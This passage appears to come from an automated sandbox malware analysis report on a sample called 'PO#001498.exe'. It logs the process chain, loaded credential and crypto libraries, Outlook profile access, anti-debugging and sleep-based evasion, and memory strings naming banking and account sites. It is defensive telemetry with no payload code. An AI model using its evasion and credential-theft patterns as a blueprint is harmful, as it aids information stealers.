Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: PO#001498.exe Static file information: File size 1364803 > 1048576
Source: Binary string: forfiles.pdb source: svchost.exe, 00000008.00000003.1742969007.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742956316.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742907274.000000000321B000.00000004.00000020.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3124009966.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: forfiles.pdbGCTL source: svchost.exe, 00000008.00000003.1742969007.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742956316.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742907274.000000000321B000.00000004.00000020.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3124009966.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AnbtBVreItY.exe, 0000000B.00000000.1697791921.000000000098E000.00000002.00000001.01000000.00000005.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842122598.000000000098E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: PO#001498.exe, 00000000.00000003.1308560731.0000000004850000.00000004.00001000.00020000.00000000.sdmp, PO#001498.exe, 00000000.00000003.1305915551.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1681555136.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1683279079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.0000000003800000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1778969932.00000000049D2000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1776788198.0000000004827000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO#001498.exe, 00000000.00000003.1308560731.0000000004850000.00000004.00001000.00020000.00000000.sdmp, PO#001498.exe, 00000000.00000003.1305915551.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1681555136.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1683279079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.0000000003800000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, forfiles.exe, 0000000C.00000003.1778969932.00000000049D2000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1776788198.0000000004827000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F35000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3136018758.00000000051AC000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842704933.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2070941487.000000003391C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F35000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3136018758.00000000051AC000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842704933.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2070941487.000000003391C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Source: PO#001498.exe Static PE information: real checksum: 0xa2135 should be: 0x153f9a
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004160C0 push edi; retf 8_2_004160C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004149D7 push eax; ret 8_2_004149DC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00403180 push eax; ret 8_2_00403182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00424373 push edi; iretd 8_2_0042437B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00415B35 push edi; ret 8_2_00415B3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0041439C push ebp; retf 8_2_004143A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0041840F push esi; ret 8_2_00418426
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00415CEA push cs; retf 8_2_00415CFF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0041549D push ebp; ret 8_2_004154F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004245D3 push esp; retf 8_2_004245E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0041164F push eax; iretd 8_2_004116AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00415EF7 push ss; iretd 8_2_00415F1A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004116BC push eax; iretd 8_2_004116AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00411770 push ss; retf 8_2_00411778
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0041177E push ss; retf 8_2_00411778
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0380225F pushad ; ret 8_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038027FA pushad ; ret 8_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038309AD push ecx; mov dword ptr [esp], ecx 8_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0380283D push eax; iretd 8_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03801368 push eax; iretd 8_2_03801369
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04818898 push eax; ret 11_2_0481889D
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_048199F6 push edi; ret 11_2_04819A00
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04815510 push eax; iretd 11_2_04815570
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481557D push eax; iretd 11_2_04815570
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04811EA6 push 00000048h; retf 11_2_04811EA8
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481C2D0 push esi; ret 11_2_0481C2E7
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04815631 push ss; retf 11_2_04815639
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481563F push ss; retf 11_2_04815639
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481825D push ebp; retf 11_2_04818267
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04819F81 push edi; retf 11_2_04819F82
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00444078 0_2_00444078
Source: C:\Users\user\Desktop\PO#001498.exe API/Special instruction interceptor: Address: 427A24C
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\forfiles.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E rdtsc 8_2_0387096E
Source: C:\Windows\SysWOW64\forfiles.exe Window / User API: threadDelayed 9783 Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe API coverage: 3.1 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\forfiles.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\forfiles.exe TID: 1732 Thread sleep count: 190 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 1732 Thread sleep time: -380000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 1732 Thread sleep count: 9783 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe TID: 1732 Thread sleep time: -19566000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe TID: 3256 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe TID: 3256 Thread sleep time: -34500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\forfiles.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CCC600 FindFirstFileW,FindNextFileW,FindClose, 12_2_02CCC600
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 20Y-W08y.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 20Y-W08y.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 20Y-W08y.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 20Y-W08y.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: AnbtBVreItY.exe, 0000000E.00000002.3130047245.000000000134F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 20Y-W08y.12.dr Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000012.00000002.2081892999.000001963397C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: 20Y-W08y.12.dr Binary or memory string: global block list test formVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 20Y-W08y.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 20Y-W08y.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 20Y-W08y.12.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 20Y-W08y.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 20Y-W08y.12.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 20Y-W08y.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 20Y-W08y.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 20Y-W08y.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 20Y-W08y.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 20Y-W08y.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 20Y-W08y.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E rdtsc 8_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00417683 LdrLoadDll, 8_2_00417683
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0427A4B8 mov eax, dword ptr fs:[00000030h] 0_2_0427A4B8
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0427A518 mov eax, dword ptr fs:[00000030h] 0_2_0427A518
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_04278E78 mov eax, dword ptr fs:[00000030h] 0_2_04278E78
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385438F mov eax, dword ptr fs:[00000030h] 8_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385438F mov eax, dword ptr fs:[00000030h] 8_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EC3CD mov eax, dword ptr fs:[00000030h] 8_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B63C0 mov eax, dword ptr fs:[00000030h] 8_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 8_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h] 8_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h] 8_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
